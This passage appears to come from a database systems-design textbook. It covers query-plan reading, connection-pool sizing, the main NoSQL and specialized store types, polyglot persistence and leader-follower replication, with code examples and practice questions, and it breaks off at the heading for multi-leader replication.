SELECT o.id, o.total, c.name
FROM orders o
JOIN customers c ON c.id = o.customer_id
WHERE o.created_at >= '2026-01-01' AND o.status = 'paid'
ORDER BY o.created_at DESC
LIMIT 20;
READING A PLAN (innermost/most-indented runs first)
Limit (cost=0.85..42.1 rows=20) (actual time=0.05..1.20 rows=20 loops=1)
-> Nested Loop (cost=0.85..2104 rows=1000) (actual rows=20)
-> Index Scan Backward using idx_orders_created on orders o
Index Cond: (created_at >= '2026-01-01')
Filter: (status = 'paid')
Rows Removed by Filter: 4820 <- WARNING: reading and
-> Index Scan using customers_pkey on customers c discarding 4820 rows
Index Cond: (id = o.customer_id)
What to look for:
estimated rows vs. ACTUAL rows large gap -> stale statistics or skew
Seq Scan on a large table -> missing index (fine on small tables)
"Rows Removed by Filter" large -> the index does not cover the filter
Nested Loop with many loops -> should probably be a hash join
external merge Disk: 24MB -> sort spilled; raise work_mem or index
-- The fix here: an index matching BOTH the filter and the sort order.
CREATE INDEX idx_orders_status_created
ON orders (status, created_at DESC);
-- Now: equality column first, then the range/sort column. The planner can seek
-- directly to status='paid' and walk created_at in order, so LIMIT 20 stops
-- after 20 rows instead of filtering thousands.
-- Keep statistics fresh; after a bulk load they are always wrong.
ANALYZE orders;
-- For a skewed column the default sample may be too small
ALTER TABLE orders ALTER COLUMN status SET STATISTICS 1000;
| Join strategy | How it works | Planner picks it when |
|---|---|---|
| Nested loop | For each outer row, look up inner | Outer side is small; inner indexed |
| Hash join | Build a hash table, probe it | Large unsorted inputs, equality join |
| Merge join | Walk two sorted inputs together | Both inputs already sorted on the key |
The most common real-world planner problems, in order of frequency: stale
statistics after a bulk load; non-sargable predicates (a function or cast
on the indexed column, from the previous subchapter); LIMIT with an
unsupported sort, forcing a full sort before returning 20 rows; and
parameter-sensitive plans, where a plan cached for a selective value is
disastrous for a common one.
Key Takeaways
- The planner chooses among strategies using table statistics; stale statistics are the top cause of bad plans.
- Read
EXPLAIN ANALYZEand compare estimated with actual rows — a large gap points to the problem.- Match indexes to both the filter and the sort so
LIMITcan stop early.- Watch for sequential scans on large tables, high "rows removed by filter", and sorts spilling to disk.
🧪 Practice
- Take a slow query you know, run
EXPLAIN ANALYZE, and identify the single most expensive node.- Explain why
ORDER BY created_at LIMIT 10can be slow without a matching index even though it returns 10 rows.- Interview: A query is fast in staging and slow in production with identical schemas. Name three causes. (Hint: what differs between the two environments besides the SQL text?)
Connection Pooling
Opening a database connection is expensive: a TCP handshake, TLS negotiation, authentication, and — in PostgreSQL — forking a backend process that allocates several megabytes. Doing that per request adds tens of milliseconds and can exhaust the database's connection limit long before its CPU is busy. A connection pool keeps a set of established connections and lends them out.
The counterintuitive part is that more connections do not mean more throughput. Past a point set by cores and disk parallelism, additional connections only add context switching, lock contention, and memory pressure — throughput flattens and latency rises. The right pool is usually far smaller than teams expect.
WITHOUT POOLING WITH POOLING
request -> connect (30 ms) request -> borrow (0.1 ms)
-> query (2 ms) -> query (2 ms)
-> close -> return to pool
93% of the time is setup. The connection is established once and
At 500 RPS you also create 500 reused thousands of times.
backends/second on the database.
from sqlalchemy import create_engine
engine = create_engine(
"postgresql://app@db/orders",
pool_size=20, # persistent connections per application instance
max_overflow=10, # temporary extras under burst (total ceiling: 30)
pool_timeout=3, # FAIL FAST if none is free; do not queue forever
pool_recycle=1800, # recycle before the DB or a proxy times them out
pool_pre_ping=True, # cheap liveness check; avoids handing out dead sockets
)
# Sizing is arithmetic, not intuition. Little's Law (Chapter 1.2):
# connections needed = query_rate x average_query_duration
qps, avg_query_s = 800, 0.004
print(qps * avg_query_s) # 3.2 -> ~4 busy at any instant
# A pool of 20 leaves generous headroom for latency spikes. A pool of 200 would
# just queue work inside the database instead of inside the pool.
# The ceiling that actually matters is the DATABASE's, shared by every client:
instances, pool_per_instance = 40, 30
print(instances * pool_per_instance) # 1200 -> far above a typical
# max_connections of 100-500
That last calculation is the classic outage. Each service instance looks reasonable in isolation; multiplied by autoscaling, the fleet exhausts the database's connection limit and every service fails at once, including the ones that were healthy.
| Problem | Fix |
|---|---|
| Pool exhausted under load | Shorten queries; fail fast rather than queueing forever |
Fleet exceeds database max_connections | An external pooler (PgBouncer) in front of the database |
| Connections killed by an idle firewall | pool_recycle shorter than the idle timeout |
| Leaked connections | Always use context managers; monitor checked-out count |
| Long transactions holding connections | Never do HTTP calls or sleeps inside a transaction |
For large fleets, an external pooler such as PgBouncer in transaction mode is
the standard answer: thousands of client connections multiplex onto a few dozen
real database connections. The caveat is that transaction-mode pooling breaks
session-scoped features — prepared statements, advisory locks, SET state, and
temporary tables — so it changes what your application may assume.
Key Takeaways
- Connection setup is expensive; pools amortize it across many requests.
- More connections do not mean more throughput — size from Little's Law, not optimism.
- The real limit is the database's total, shared across every instance; multiply before you autoscale.
- Fail fast on pool exhaustion, recycle connections, and never hold one across an external call.
🧪 Practice
- Size a pool for a service handling 1,200 QPS with 6 ms average query time, and state your headroom assumption.
- Compute the fleet-wide connection total for 60 instances with
pool_size=25and compare it with amax_connectionsof 400.- Interview: Adding application servers made database latency worse. Explain. (Hint: consider what each new server brings with it, and what the database does when it has more concurrent work than cores.)
<a id="43-nosql-and-specialized-stores"></a>
4.3 NoSQL and Specialized Stores
Relational databases are general-purpose; each store in this subchapter gives up some generality to be dramatically better at one access pattern.
Key-Value Stores
The simplest possible database: a distributed hash map. You GET and PUT
values by key, and the store makes no attempt to understand what the value
contains. That restriction is the source of its power — with no query planner, no
joins, and no secondary indexes to maintain, lookups are O(1) and the data
partitions trivially across any number of nodes by hashing the key.
The analogy is a coat check. Hand over a coat, get a numbered ticket, retrieve it instantly by number. You cannot ask "which coats are blue?" — that is precisely the query the design refuses to support.
KEY VALUE (opaque bytes)
----------------------------------------------------
session:a3f9c2 {"user_id":7,"exp":...}
cart:user:7 {"items":[...]}
ratelimit:client:88:minute 47
feature_flags:v3 {"new_checkout":true}
Supported: GET, PUT, DELETE, TTL, atomic counters
NOT supported: "find all sessions for user 7" <- needs a second key
# Redis: the value type is where the expressiveness lives.
r.setex("session:a3f9c2", 3600, json.dumps(session)) # string + TTL
r.incr("views:post:42") # atomic counter
r.hset("user:7", mapping={"name": "Ada", "tier": "pro"}) # hash: partial updates
r.zadd("leaderboard", {"ada": 4820}) # sorted set: ranked queries
r.zrevrange("leaderboard", 0, 9) # top 10 in O(log n + 10)
# The design discipline: you must know the key before you can read.
# Any other access path is a key you maintain YOURSELF, in the same transaction.
pipe = r.pipeline(transaction=True)
pipe.set(f"session:{sid}", payload, ex=3600)
pipe.sadd(f"user_sessions:{user_id}", sid) # the reverse index, hand-built
pipe.expire(f"user_sessions:{user_id}", 3600)
pipe.execute()
# Now "log this user out everywhere" is possible — because you planned for it.
| Store | Persistence | Distinguishing feature |
|---|---|---|
| Redis | Optional (RDB/AOF) | Rich value types, single-threaded atomicity |
| Memcached | None | Pure cache, multi-threaded, very simple |
| DynamoDB | Durable, managed | Serverless scaling, secondary indexes |
| etcd / ZooKeeper | Durable, consensus | Strong consistency for coordination |
| RocksDB | Embedded | LSM engine used inside other systems |
Key-value stores are the right answer for caching, sessions, rate limiting,
feature flags, leaderboards, and any lookup where the key is known. They are the
wrong answer whenever you need to query by value, and the failure mode is
predictable: someone eventually writes a SCAN over the keyspace in production
and blocks the server.
Key Takeaways
- A key-value store trades query capability for O(1) lookups and trivial partitioning.
- Every access path must be a key you deliberately maintain, including reverse indexes.
- Redis's value types (hashes, sorted sets) provide atomic operations beyond simple get/put.
- Never scan the keyspace in production — if you need that query, you chose the wrong store.
🧪 Practice
- Design the key schema for a shopping cart supporting "get cart", "add item", and "expire after 30 days".
- Implement "log out all sessions for a user" and name what must happen atomically.
- Interview: When is Redis the primary store rather than a cache? (Hint: ask what happens to the business if the dataset is lost, and what durability settings actually guarantee.)
Document Stores
Relational schemas require you to know your fields in advance and to spread one logical entity across several tables. That is exactly right when data is shared between many use cases, and it is friction when an entity is naturally self-contained and its shape varies. Document stores keep each entity as one nested JSON-like document, retrievable in a single read.
The key property is locality: everything about one entity sits together on disk, so fetching it costs one read rather than a five-table join. The trade is that data shared across documents gets duplicated, and keeping duplicates in sync becomes your job.
// One document holds what would be four normalized tables.
{
"_id": ObjectId("..."),
"orderNumber": "ORD-2026-4821",
"status": "paid",
"customer": { // embedded: fetched with the order,
"id": 7, // duplicated if the name changes
"name": "Ada Lovelace",
"shippingAddress": { "city": "Turin", "country": "IT" }
},
"items": [ // an array, not a join table
{ "productId": 12, "name": "Lamp", "qty": 2, "unitPrice": "29.00" }
],
"total": "58.00",
"createdAt": ISODate("2026-03-11T10:04:22Z")
}
// The central modelling decision: embed or reference.
db.orders.findOne({ orderNumber: "ORD-2026-4821" }); // 1 read, whole order
// EMBED when: the child is owned by the parent, read together, bounded in size,
// and rarely changes independently. (order items)
// REFERENCE when: the child is shared, unbounded, or updated on its own.
{ "_id": 42, "authorId": 7 } // reference
db.posts.aggregate([ // then $lookup to join
{ $match: { _id: 42 } },
{ $lookup: { from: "users", localField: "authorId",
foreignField: "_id", as: "author" } }
]);
// The hard limit that decides many cases: a document has a maximum size
// (16 MB in MongoDB). An unbounded array — comments on a viral post, events on
// a device — will eventually exceed it. Never embed an unbounded collection.
| Aspect | Document store | Relational |
|---|---|---|
| Entity storage | One nested document | Rows across several tables |
| Schema | Flexible per document | Enforced, uniform |
| Read of one entity | Single read | Join across tables |
| Shared data | Duplicated; must be synced | Referenced once |
| Multi-entity queries | Weaker ($lookup is limited) | Native and optimized |
| Schema changes | No migration needed to add fields | ALTER TABLE, planned migration |
"Schemaless" is the most misleading word in this area. The schema does not disappear; it moves into application code, where every reader must handle every historical shape a document might have. Mature teams therefore apply schema validation at the database level and version their documents explicitly — which is most of the discipline of a relational schema, applied voluntarily.
Key Takeaways
- Documents give locality: one entity, one read, nested structure included.
- Embed owned, bounded, co-read data; reference shared, unbounded, or independently updated data.
- Never embed an unbounded array — document size limits are hard limits.
- Schemaless moves the schema into application code; use validation and document versions deliberately.
🧪 Practice
- Model a blog with posts, authors, comments, and tags. Justify each embed-versus-reference decision.
- Explain what breaks when a user changes their display name in a design that embeds the author in every post, and give two fixes.
- Interview: A team chose a document store "so we don't need migrations". What have they actually deferred? (Hint: the old data does not update itself — who deals with it, and when?)
Wide-Column Stores
Some workloads write far more than they read, need to run across many datacenters without a single leader, and must scale to petabytes with predictable latency. Relational databases struggle at that shape. Wide-column stores (Cassandra, ScyllaDB, HBase, Bigtable) are built for it, with an LSM engine, leaderless replication, and a data model designed around partitions.
The model looks tabular but behaves very differently. A partition key determines which node holds the data; clustering keys determine the sort order within that partition. A query that specifies the partition key is a single-node sorted lookup — extremely fast. A query that does not is a scatter-gather across the whole cluster, and the database will usually refuse to run it.
PARTITION KEY = which node. CLUSTERING KEYS = sort order inside the node.
PRIMARY KEY ((sensor_id), reading_time DESC)
^^^^^^^^^ ^^^^^^^^^^^^
node A: sensor_1 -> [t9|22.1][t8|22.3][t7|22.0] ... one contiguous, sorted row
node B: sensor_2 -> [t9|18.4][t8|18.6] ...
node C: sensor_3 -> ...
FAST: WHERE sensor_id = 1 AND reading_time > ... (one partition, sorted scan)
SLOW: WHERE reading_time > ... (every partition; refused
without ALLOW FILTERING)
-- The defining discipline: model tables per QUERY, not per entity. Duplicating
-- data across tables is normal and expected here, not a design smell.
CREATE TABLE readings_by_sensor (
sensor_id UUID,
reading_time TIMESTAMP,
value DOUBLE,
PRIMARY KEY ((sensor_id), reading_time)
) WITH CLUSTERING ORDER BY (reading_time DESC);
CREATE TABLE readings_by_site_day ( -- the SAME data, keyed for a second query
site_id UUID,
day DATE, -- bucketing keeps partitions bounded
reading_time TIMESTAMP,
sensor_id UUID,
value DOUBLE,
PRIMARY KEY ((site_id, day), reading_time)
);
-- The application writes both. There are no joins to fall back on.
-- Tunable consistency per query (see 4.4 on quorums):
SELECT * FROM readings_by_sensor WHERE sensor_id = ? LIMIT 100; -- often ONE
INSERT INTO readings_by_sensor (...) VALUES (...); -- often QUORUM
| Property | Wide-column | Relational |
|---|---|---|
| Write path | LSM, append-only, very fast | B-tree, in-place |
| Scaling | Linear, add nodes | Vertical, then sharding |
| Topology | Leaderless, multi-datacenter native | Leader-follower |
| Joins | None | Native |
| Query planning | None — the key decides everything | Cost-based planner |
| Consistency | Tunable per operation | ACID by default |
| Modelled around | Queries | Entities |
Two failure modes account for most wide-column trouble. Unbounded partitions:
a partition key like site_id alone grows forever, eventually making one row
gigabytes in size — hence the day bucket above. And tombstone accumulation
from deletes or TTLs, which makes range scans read enormous numbers of deleted
rows before returning anything.
Key Takeaways
- Wide-column stores optimize for write throughput, linear scaling, and multi-datacenter operation.
- The partition key picks the node; clustering keys sort within it; queries must supply the partition key.
- Model one table per query and duplicate data freely — there are no joins.
- Bound partition sizes with bucketing, and watch tombstones on delete-heavy tables.
🧪 Practice
- Design tables for "messages in a chat room, newest first" and "all messages by one user", and state what the write path must do.
- Explain why
PRIMARY KEY ((user_id), created_at)becomes a problem for a user with 50 million events, and fix it.- Interview: Why does Cassandra have no joins, and what does that force onto the application? (Hint: think about what a join would require across nodes, and when the alternative work has to happen instead.)
Graph Databases
Some questions are about relationships rather than records: "who are the friends of my friends who work at this company?", "what is the shortest path of ownership between these two companies?", "which accounts are within three transfers of a known fraudster?". In SQL, each additional hop is another self-join, and cost grows exponentially. Graph databases make traversal the primitive operation instead.
The reason they are fast is index-free adjacency: each node stores direct pointers to its neighbours, so following an edge is a pointer dereference rather than an index lookup. Traversal cost is proportional to the part of the graph you actually visit, not to the total number of nodes.
THE SAME QUESTION, TWO SHAPES
RELATIONAL: friends-of-friends-of-friends
friendships JOIN friendships JOIN friendships
-> each join multiplies rows; at depth 5 the query is unusable
GRAPH:
(Ada)---FRIEND---(Bob)---FRIEND---(Cleo)
| |
WORKS_AT WORKS_AT
v v
(AcmeCo) (AcmeCo)
MATCH (a)-[:FRIEND*2..3]-(f)-[:WORKS_AT]->(c)
-> walk pointers outward; cost depends on the neighbourhood visited
// Cypher reads like the picture it describes.
MATCH (me:Person {email: $email})-[:FRIEND*2..3]-(fof:Person)
-[:WORKS_AT]->(c:Company {name: 'AcmeCo'})
WHERE NOT (me)-[:FRIEND]-(fof) // exclude direct friends
AND me <> fof
RETURN DISTINCT fof.name, length(shortestPath((me)-[:FRIEND*]-(fof))) AS distance
ORDER BY distance
LIMIT 10;
-- The relational equivalent, for comparison. It works, and it degrades fast
-- as depth grows because each level fans out.
WITH RECURSIVE reachable(person_id, depth) AS (
SELECT friend_id, 1 FROM friendships WHERE person_id = $1
UNION
SELECT f.friend_id, r.depth + 1
FROM reachable r JOIN friendships f ON f.person_id = r.person_id
WHERE r.depth < 3 -- the depth cap is doing heavy lifting
)
SELECT DISTINCT person_id FROM reachable;
| Use case | Why a graph fits |
|---|---|
| Social networks | Friend-of-friend, mutual connections |
| Fraud detection | Rings and paths between accounts |
| Recommendations | "People who bought X also connected to Y" |
| Network and IT topology | Dependency and impact analysis |
| Identity and access | Transitive permission resolution |
| Knowledge graphs | Entities and typed relationships |
Graph databases are a poor fit for the workloads relational databases excel at — bulk aggregations, reporting, and high-volume simple CRUD — and they are usually harder to shard, because partitioning a graph inevitably cuts edges and turns local traversals into network calls. The common architecture is therefore a graph store alongside a primary store, holding the relationship data only.
Key Takeaways
- Graph databases make traversal the primitive via index-free adjacency.
- Traversal cost scales with the neighbourhood visited, not with total dataset size.
- Multi-hop questions that need recursive self-joins in SQL are the signal to consider one.
- They shard poorly and are weak at aggregation — usually a companion store, not the primary.
🧪 Practice
- Model a movie recommendation domain as nodes and typed edges, then write the traversal for "movies liked by people who liked what I liked".
- Write the SQL for a 4-hop friend query and explain where the cost comes from.
- Interview: Why are graph databases hard to shard? (Hint: think about what a traversal does when the next node lives on another machine.)
Time-Series Databases
Metrics, sensor readings, financial ticks, and application telemetry share an
unusual shape: writes are almost exclusively appends of recent timestamps,
records are small and numerous, data is queried in time ranges with aggregation,
and old data becomes less valuable with age. A general-purpose database handles
this badly — indexes bloat, tables grow without bound, and avg() over a billion
rows is slow. Time-series databases exploit every one of those properties.
Three optimizations do most of the work. Time-based partitioning (chunks per hour or day) means a query for the last hour touches one chunk and dropping old data is a chunk drop rather than a mass delete. Columnar, delta-encoded storage compresses ruthlessly, because consecutive timestamps differ by a constant and consecutive values differ slightly. And automatic downsampling replaces old raw points with pre-aggregated rollups.
WHY TIME SERIES COMPRESSES SO WELL
timestamps 1710000000, 1710000010, 1710000020, 1710000030
delta +10, +10, +10 -> store "10" once
values 22.14, 22.15, 22.13, 22.16
XOR of floats -> few changed bits -> a handful of bits per point
Real-world result: 10-20x smaller than row-oriented storage for the same data.
RETENTION AS A LIFECYCLE, NOT A DELETE JOB
0-7 days raw, 1-second resolution (fast queries, high volume)
7-90 days 1-minute rollups (100x smaller)
90d-2 years 1-hour rollups (another 60x smaller)
> 2 years dropped, or archived to object storage
-- TimescaleDB: a hypertable is time-partitioned automatically.
CREATE TABLE readings (
time TIMESTAMPTZ NOT NULL,
sensor_id INT NOT NULL,
value DOUBLE PRECISION
);
SELECT create_hypertable('readings', 'time', chunk_time_interval => INTERVAL '1 day');
-- A continuous aggregate: the rollup is maintained incrementally, not
-- recomputed on every query.
CREATE MATERIALIZED VIEW readings_hourly
WITH (timescaledb.continuous) AS
SELECT time_bucket('1 hour', time) AS bucket,
sensor_id,
avg(value) AS avg_value,
max(value) AS max_value
FROM readings
GROUP BY bucket, sensor_id;
-- Retention becomes policy, not a nightly DELETE that bloats the table.
SELECT add_retention_policy('readings', INTERVAL '7 days');
SELECT add_compression_policy('readings', INTERVAL '1 day');
| Capability | Time-series DB | General-purpose DB |
|---|---|---|
| Write pattern | Optimized for timestamp appends | General; index maintenance cost |
| Compression | 10-20x via delta/XOR encoding | Modest, page-level |
| Time-range queries | Partition pruning, near-constant | Index scan over a growing table |
| Downsampling | Built-in continuous aggregates | Manual cron jobs |
| Retention | Drop a chunk (instant) | DELETE (slow, bloats, vacuums) |
| Late-arriving data | Supported but costly | Same as any write |
The main gotchas are cardinality and out-of-order writes. Every distinct combination of tag values creates a separate series, so putting a user id or a request id in a tag can create millions of series and exhaust memory — this is the single most common way teams take down a metrics system. And data arriving long after its timestamp forces old chunks to be rewritten, which is expensive.
Key Takeaways
- Time-series stores exploit append-mostly writes, time-range queries, and declining data value.
- Time partitioning makes range queries fast and retention a chunk drop rather than a delete.
- Delta and XOR encoding give 10-20x compression on timestamps and slowly changing values.
- Guard tag cardinality — high-cardinality labels are the classic way to kill a metrics system.
🧪 Practice
- Design a retention and downsampling policy for 50,000 sensors reporting every 10 seconds, kept usefully for two years.
- Compute the raw storage for one year at that rate at 16 bytes per point, then estimate it with 10x compression.
- Interview: A team adds
request_idas a metric label and the system falls over. Explain precisely why. (Hint: think about what a unique label value creates, and how many of them exist.)
Search Engines and Inverted Indexes
WHERE description LIKE '%wireless headphones%' cannot use a B-tree index — the
leading wildcard makes ordering useless — so it scans every row. Beyond that, it
does not do what users mean: it will not match "headphone", will not rank
results, and will not tolerate a typo. Full-text search is a different problem
requiring a different index.
The core structure is the inverted index: instead of mapping documents to their words, it maps each word to the documents containing it. Finding documents with two terms becomes an intersection of two lists — fast regardless of corpus size.
FORWARD INDEX (what a database has) INVERTED INDEX (what search needs)
doc1 -> "wireless bluetooth headphones" wireless -> [doc1, doc3]
doc2 -> "wired headphones" bluetooth -> [doc1]
doc3 -> "wireless mouse" headphones -> [doc1, doc2]
wired -> [doc2]
mouse -> [doc3]
Query "wireless headphones":
intersect [doc1,doc3] with [doc1,doc2] -> doc1
then RANK by relevance (BM25: term rarity x frequency x field length)
Getting from raw text to that index is the analysis pipeline, and it is where search quality is actually determined:
"Wireless Bluetooth Headphones!"
-> tokenize ["Wireless","Bluetooth","Headphones"]
-> lowercase ["wireless","bluetooth","headphones"]
-> stop words (remove "the","a","and" — not applicable here)
-> stemming ["wireless","bluetooth","headphon"] <- so "headphone"
-> synonyms ["wireless","bt","bluetooth",...] also matches
-> index
The SAME pipeline must run on the query. A mismatch between index-time and
query-time analysis is the most common cause of "why does nothing match?".
{
"query": {
"bool": {
"must": [{ "multi_match": {
"query": "wireless headphones",
"fields": ["title^3", "description"],
"fuzziness": "AUTO" }}],
"filter": [{ "term": { "in_stock": true }},
{ "range": { "price": { "lte": 200 }}}]
}
},
"aggs": { "by_brand": { "terms": { "field": "brand.keyword" }}},
"sort": ["_score"]
}
Three things in that query are what a relational database cannot easily do:
title^3 boosts title matches over description matches, fuzziness tolerates
typos, and aggs computes faceted counts (the "Brand (42)" filters in a
storefront sidebar) in the same pass.
| Capability | Search engine | Relational database |
|---|---|---|
| Full-text matching | Native, analyzed | LIKE scan or a bolt-on index |
| Relevance ranking | BM25, tunable boosts | None |
| Typo tolerance | Fuzzy matching | None |
| Faceted aggregation | Built in | GROUP BY per facet |
| Transactions | None | ACID |
| Source of truth | No — a derived index | Yes |
That final row is the architectural rule: a search engine is a derived index, never the system of record. The database owns the data; a pipeline (often CDC, covered in 4.6) keeps the index in sync, and the index must be rebuildable from scratch, because eventually you will need to reindex after a mapping change.
Key Takeaways
- Inverted indexes map terms to documents, making multi-term search an intersection.
- The analysis pipeline (tokenize, lowercase, stem, synonyms) determines match quality and must be identical at index and query time.
- Search engines add ranking, fuzziness, and faceting that databases lack.
- Treat the index as derived and disposable; the database remains the source of truth.
🧪 Practice
- Build the inverted index for three short sentences and show the intersection for a two-word query.
- Explain why searching for "running" fails to match "run" without stemming, and what could go wrong if stemming is too aggressive.
- Interview: How do you keep a search index in sync with a database, and what happens when they diverge? (Hint: think about the sync mechanism, how you detect drift, and what "rebuild from scratch" costs.)
Vector Databases
Keyword search matches strings. It cannot tell that "car" and "automobile" mean the same thing, or find "documents about the same topic as this one". Semantic similarity requires representing meaning numerically: an embedding model maps text, images, or audio into a vector of hundreds or thousands of dimensions, such that similar meanings land near each other. A vector database stores those vectors and answers "find the nearest ones".
The naive approach — compute the distance to every stored vector — is O(n) per query and hopeless at millions of vectors. Vector databases use approximate nearest neighbour (ANN) indexes, which accept a small loss of recall in exchange for sub-linear search.
EMBEDDING SPACE (shown in 2D; really 384-3072 dimensions)
"dog" "puppy"
* * Similarity = cosine of the angle
"cat" between vectors, or Euclidean distance.
*
"car" A query is embedded with the SAME model,
* then the index finds its nearest points.
"automobile"
*
HNSW INDEX: a navigable small-world graph in layers
layer 2 o--------------o coarse hops across the space
layer 1 o----o----o----o medium hops
layer 0 o-o-o-o-o-o-o-o-o every vector; fine-grained
Search descends layer by layer: O(log n) instead of O(n).
# The standard retrieval-augmented pattern: embed, search, filter, use.
query_vec = embed_model.encode("How do I reset my password?") # SAME model
# used at index time
results = index.search(
vector=query_vec,
top_k=5,
filter={"tenant_id": 42, "doc_type": "help_article"}, # pre-filter: correctness
metric="cosine", # AND it shrinks the search
)
for r in results:
print(r.score, r.metadata["title"])
# Two rules that decide whether this works in production:
# 1. Query and documents MUST use the same embedding model and version.
# Changing models means re-embedding the entire corpus — plan for it.
# 2. Filters must be applied by the index, not after retrieval. Fetching
# top-5 then filtering by tenant can return zero results for a tenant
# whose documents were all ranked below the global top 5 — and, worse,
# leaks nothing but also finds nothing.
| Index type | Build cost | Query speed | Recall | Memory | Notes |
|---|---|---|---|---|---|
| Flat (exact) | None | O(n) | 100% | Low | Correct; fine below ~100k |
| IVF | Medium | Fast | Tunable | Medium | Cluster, then search a few |
| HNSW | High | Very fast | High | High | The common default |
| PQ / IVF-PQ | High | Very fast | Lower | Very low | Compresses vectors; large scale |
Vectors are large: 1 million vectors at 1,536 dimensions of float32 is about
6 GB before index overhead, so memory is usually the binding constraint. And
because pure semantic search can miss exact identifiers ("error code E4021"), the
strongest production setups use hybrid search — combining BM25 keyword scores
with vector similarity — rather than either alone.
Key Takeaways
- Embeddings turn meaning into coordinates; vector databases find nearest neighbours in that space.
- ANN indexes such as HNSW trade a little recall for sub-linear search.
- Query and corpus must share an embedding model; changing it means re-embedding everything.
- Filter inside the index, mind the memory footprint, and prefer hybrid keyword plus vector search.
🧪 Practice
- Compute the memory for 5 million 768-dimension
float32vectors, then with 8-bit quantization.- Explain why post-filtering search results by tenant is both a correctness and a relevance problem.
- Interview: When does keyword search beat vector search? (Hint: think about exact identifiers, rare tokens, and what an embedding blurs together.)
Polyglot Persistence
Each store in this subchapter is excellent at one thing and mediocre or hopeless at others. Polyglot persistence is the deliberate use of several stores in one system, each holding the data whose access pattern it serves best — rather than forcing everything into one database and accepting the worst fit everywhere.
The benefit is obvious; the cost is what teams underestimate. Every additional store is another thing to operate, back up, secure, monitor, upgrade, and staff expertise for — and, most importantly, another copy of data that can drift out of sync with the others.
ONE SYSTEM, SEVERAL STORES, ONE SOURCE OF TRUTH
writes
|
v
[ PostgreSQL ] <- SOURCE OF TRUTH: orders, users, payments
|
change stream (CDC, section 4.6)
+-----------+-----------+-------------+
v v v v
[Elasticsearch] [Redis] [ClickHouse] [vector DB]
product search cache analytics semantic search
| | | |
derived derived derived derived
(rebuildable) (expendable) (rebuildable) (rebuildable)
The rule that makes this safe: exactly ONE store is authoritative for any
given fact. Everything else is derived and must be rebuildable from it.
# The anti-pattern: dual writes. Two writes, no transaction between them.
def create_product_bad(product, db, search):
db.insert(product) # succeeds
search.index(product) # network error -> permanently inconsistent
# There is no rollback for the first write once the second fails, and a
# retry can double-apply. Dual writes always drift, eventually.
# The pattern: write once, derive asynchronously from the change stream.
def create_product(product, db):
with db.transaction():
db.insert("products", product)
db.insert("outbox", { # same transaction: atomic
"event": "product.created",
"payload": product.to_json(),
})
# A separate relay publishes outbox rows to the stream; consumers update
# the search index, the cache, and the analytics store. Each consumer is
# idempotent and can be replayed from scratch if it falls behind or breaks.
| Store | Holds | Rebuildable from source? |
|---|---|---|
| Relational | Transactional entities | Source of truth |
| Key-value cache | Hot lookups, sessions | Yes (or expendable) |
| Search index | Text and facets | Yes |
| Analytics/columnar | Aggregations, reporting | Yes |
| Time-series | Metrics and telemetry | Usually its own source |
| Vector | Embeddings | Yes (re-embed) |
| Object storage | Blobs | Source of truth for blobs |
Practical discipline: start with one database. A single relational store with JSON columns, full-text search, and array types covers a surprising amount of ground, and PostgreSQL in particular can serve as document store, queue, search engine, and time-series database well past the point most teams assume. Add a specialized store when you have a measured problem the current one cannot solve — and when you do, be explicit about which store owns the truth and how the derived one is rebuilt.
Key Takeaways
- Polyglot persistence matches each access pattern to the store that serves it best.
- Every extra store adds operational burden and another copy that can drift.
- Exactly one store owns each fact; all others are derived and must be rebuildable.
- Avoid dual writes — derive from a change stream using the outbox pattern.
- Start with one database and add stores only for measured problems.
🧪 Practice
- For an e-commerce platform, list which store you would use for each of: orders, product search, session state, recommendation embeddings, dashboards.
- Explain the dual-write problem with a concrete interleaving and show how the outbox pattern removes it.
- Interview: A team proposes six databases for a new product. What questions do you ask? (Hint: ask what each is measured to solve, who operates it at 3 a.m., and which one owns the truth.)
<a id="44-replication"></a>
4.4 Replication
Replication keeps copies of the same data on several machines, which is how systems survive hardware failure, serve reads at scale, and place data near users — and every scheme is a different answer to "what happens when the copies disagree?".
Leader-Follower Replication
One machine holding your data is one machine away from losing it, and one machine serving reads is a hard ceiling on read capacity. Replication solves both, and the simplest scheme — one leader, many followers — solves them with the least conceptual difficulty, which is why it is the default in PostgreSQL, MySQL, MongoDB, and most managed database services.
The rules are minimal: all writes go to the leader, the leader streams its change log to followers, and followers apply those changes in the same order and serve reads. Because there is exactly one writer, there are no write conflicts to resolve — the entire class of problems that makes the next two topics hard simply does not arise.
writes
|
v
[ LEADER ]
/ | \ replication stream (the WAL, 4.1)
v v v
[follower][follower][follower]
^ ^ ^
| | |
reads (scaled horizontally)
Writes: capped by ONE machine. Reads: scale by adding followers.
Followers are always slightly behind — that lag has its own topic below.
# Read/write splitting: the application must route deliberately, because the
# two connections have different capabilities and different guarantees.
class Database:
def __init__(self, leader_dsn, follower_dsns):
self.leader = connect(leader_dsn)
self.followers = [connect(d) for d in follower_dsns]
def write(self, sql, params):
return self.leader.execute(sql, params) # ALL writes, one place
def read(self, sql, params, consistent=False):
# `consistent=True` forces the leader: use it when the caller cannot
# tolerate stale data (right after its own write, or for a balance check).
conn = self.leader if consistent else random.choice(self.followers)
return conn.execute(sql, params)
# The failure mode to design for: a follower that has fallen far behind is
# still "up" and still answering. Route on lag, not just on liveness.
def healthy_followers(followers, max_lag_seconds=5):
return [f for f in followers
if f.replication_lag_seconds() < max_lag_seconds] or [LEADER]
Replication can be shipped at three levels, and the choice has real consequences:
| Method | What is shipped | Pros | Cons |
|---|---|---|---|
| Statement-based | The SQL text | Compact | Non-deterministic functions (now(), random()) diverge |
| Write-ahead log | Physical page changes | Exact, efficient | Followers must match the version and layout byte-for-byte |
| Logical/row-based | Logical row changes | Version-tolerant; enables CDC and selective replication | Larger stream |
| Property | What leader-follower gives you |
|---|---|
| Read scaling | Linear with follower count |
| Write scaling | None — one leader is the ceiling (that is what sharding is for) |
| Consistency | Strong on the leader; eventual on followers |
| Failure of a follower | Harmless; route around it |
| Failure of the leader | Writes stop until failover completes (see Failover and Split-Brain) |
Key Takeaways
- One leader takes all writes; followers replay the log and serve reads.
- A single writer eliminates write conflicts entirely — the scheme's main virtue.
- Read capacity scales with followers; write capacity does not scale at all.
- Route reads on replication lag, not just on whether the follower responds.
🧪 Practice
- Design read/write routing for an app where the checkout path must never read stale data but the catalogue may.
- Explain why statement-based replication corrupts a table containing
created_at DEFAULT now().- Interview: You add five followers and write latency gets worse. What could explain that? (Hint: consider what the leader now does on every commit, and what a struggling follower does to it.)
Multi-Leader Replication
